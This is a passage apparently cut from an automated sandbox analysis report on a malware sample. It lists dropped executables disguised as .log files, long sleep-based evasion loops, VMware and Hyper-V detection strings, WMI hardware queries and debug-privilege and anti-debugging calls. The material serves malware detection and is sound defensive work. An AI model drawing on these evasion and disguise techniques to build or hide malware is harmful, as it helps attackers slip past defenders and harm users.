                                Source: C:\PerfDll\hyperProviderSavesinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\kEwbgeKe.logJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\vsaRQqFM.logJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeDropped PE file which has not been started: C:\Users\user\Desktop\KEMGRwnV.logJump to dropped file
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeDropped PE file which has not been started: C:\Users\user\Desktop\zQhPhksn.logJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\msAjSsFc.logJump to dropped file
                                Source: C:\PerfDll\hyperProviderSavesinto.exeDropped PE file which has not been started: C:\Users\user\Desktop\WiKMUFpI.logJump to dropped file
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                                Source: C:\Windows\System32\conhost.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_7-14836
                                Source: C:\Windows\System32\PING.EXEEvasive API call chain: RegOpenKey,DecisionNodes,Sleep
                                Source: C:\Windows\System32\dialer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodes
                                Source: C:\Windows\System32\conhost.exeAPI coverage: 4.7 %
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeAPI coverage: 5.0 %
                                Source: C:\Windows\System32\conhost.exeAPI coverage: 4.7 %
                                Source: C:\Windows\System32\PING.EXEAPI coverage: 5.6 %
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 3989 > 30Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7712Thread sleep count: 5804 > 30Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exe TID: 7864Thread sleep time: -922337203685477s >= -30000sJump to behavior
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7200Thread sleep count: 105 > 30
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exe TID: 7200Thread sleep time: -105000s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -34126476536362649s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -600000s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -599812s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -599425s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -599292s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -599094s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -598729s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -598234s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -598125s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -598012s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -597672s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -597546s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -597437s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -597273s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -597171s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -597056s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -596804s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -596662s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -596542s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -596434s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -596327s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -596218s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -596108s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -596000s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -595890s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -595781s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -595628s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -595515s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -595406s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -595296s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -595187s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -595077s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -594968s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -594859s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -594750s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -594638s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -594530s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -594421s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -594311s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -594203s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -594093s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -593984s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -593875s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -593765s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -593656s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -593465s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -593324s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -593216s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -593099s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -592979s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -592867s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7744Thread sleep time: -592762s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exe TID: 7788Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Windows\System32\dialer.exe TID: 7936Thread sleep count: 8408 > 30
                                Source: C:\Windows\System32\dialer.exe TID: 7936Thread sleep time: -840800s >= -30000s
                                Source: C:\Windows\System32\dialer.exe TID: 8036Thread sleep count: 1449 > 30
                                Source: C:\Windows\System32\dialer.exe TID: 8036Thread sleep time: -144900s >= -30000s
                                Source: C:\Windows\System32\winlogon.exe TID: 7656Thread sleep count: 2545 > 30
                                Source: C:\Windows\System32\winlogon.exe TID: 7656Thread sleep time: -2545000s >= -30000s
                                Source: C:\Windows\System32\winlogon.exe TID: 7656Thread sleep count: 7455 > 30
                                Source: C:\Windows\System32\winlogon.exe TID: 7656Thread sleep time: -7455000s >= -30000s
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BaseBoard
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_BIOS
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeFile Volume queried: C:\ FullSizeInformation
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D7ECA0 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,IsDlgButtonChecked,IsDlgButtonChecked,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetDlgItemTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,IsDlgButtonChecked,SendDlgItemMessageW,GetDlgItem,IsDlgButtonChecked,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,IsDlgButtonChecked,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F4D7ECA0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D6647C FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7F4D6647C
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D930F0 FindFirstFileExA,0_2_00007FF7F4D930F0
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D5A69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,1_2_00D5A69B
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D6C220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,1_2_00D6C220
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB98DCE0 FindFirstFileExW,7_2_000001B0BB98DCE0
                                Source: C:\Windows\System32\wbem\WmiPrvSE.exeCode function: 9_2_00000216D26FDCE0 FindFirstFileExW,9_2_00000216D26FDCE0
                                Source: C:\Windows\System32\cmd.exeCode function: 38_2_00000150E93EDCE0 FindFirstFileExW,38_2_00000150E93EDCE0
                                Source: C:\Windows\System32\conhost.exeCode function: 40_2_00000267FCE9DCE0 FindFirstFileExW,40_2_00000267FCE9DCE0
                                Source: C:\Windows\System32\PING.EXECode function: 45_2_000002359B52DCE0 FindFirstFileExW,45_2_000002359B52DCE0
                                Source: C:\Windows\System32\winlogon.exeCode function: 49_2_00000225DC64DCE0 FindFirstFileExW,49_2_00000225DC64DCE0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D850F4 VirtualQuery,GetSystemInfo,0_2_00007FF7F4D850F4
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeThread delayed: delay time: 922337203685477Jump to behavior
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 922337203685477
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 600000
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 599812
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 599425
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 599292
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 599094
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 598729
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 598234
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 598125
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 598012
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 597672
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 597546
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 597437
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 597273
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 597171
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 597056
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596804
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596662
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596542
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596434
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596327
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596218
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596108
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 596000
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595890
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595781
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595628
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595515
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595406
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595296
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595187
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 595077
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594968
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594859
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594750
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594638
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594530
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594421
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594311
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594203
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 594093
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593984
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593875
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593765
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593656
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593465
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593324
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593216
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 593099
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 592979
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 592867
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 592762
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeThread delayed: delay time: 922337203685477
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: GargantuaN.exe, 00000001.00000003.1641039969.0000000003502000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
                                Source: wscript.exe, 00000003.00000003.1698379391.000000000332C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}f
                                Source: hyperProviderSavesinto.exe, 00000008.00000002.1751357469.000000001BB39000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}8b}K
                                Source: KZcLqgnLvRf.exe, 00000014.00000002.2908332950.000000001B8A0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllll:
                                Source: wscript.exe, 00000003.00000003.1698379391.000000000332C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\C
                                Source: PING.EXE, 0000002D.00000002.1838656558.000002359AF59000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeAPI call chain: ExitProcess graph end nodegraph_1-24978
                                Source: C:\Windows\System32\dialer.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D86900 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F4D86900
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D77DEE mov eax, dword ptr fs:[00000030h]1_2_00D77DEE
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D94170 GetProcessHeap,0_2_00007FF7F4D94170
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\PerfDll\hyperProviderSavesinto.exeProcess token adjusted: DebugJump to behavior
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess token adjusted: Debug
                                Source: C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\KZcLqgnLvRf.exeProcess token adjusted: Debug
                                Source: C:\Windows\System32\dialer.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D86900 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F4D86900
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D86AE4 SetUnhandledExceptionFilter,0_2_00007FF7F4D86AE4
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D85CA0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7F4D85CA0
                                Source: C:\Users\user\Desktop\C792057CB761DA8872421A6C906C4481B260BDB5D27B8.exeCode function: 0_2_00007FF7F4D8AC28 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7F4D8AC28
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D6F838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D6F838
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D6F9D5 SetUnhandledExceptionFilter,1_2_00D6F9D5
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D6FBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00D6FBCA
                                Source: C:\Users\user\AppData\Local\Temp\GargantuaN.exeCode function: 1_2_00D78EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D78EBD
                                Source: C:\Windows\System32\conhost.exeCode function: 7_2_000001B0BB98D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_000001B0BB98D2A4
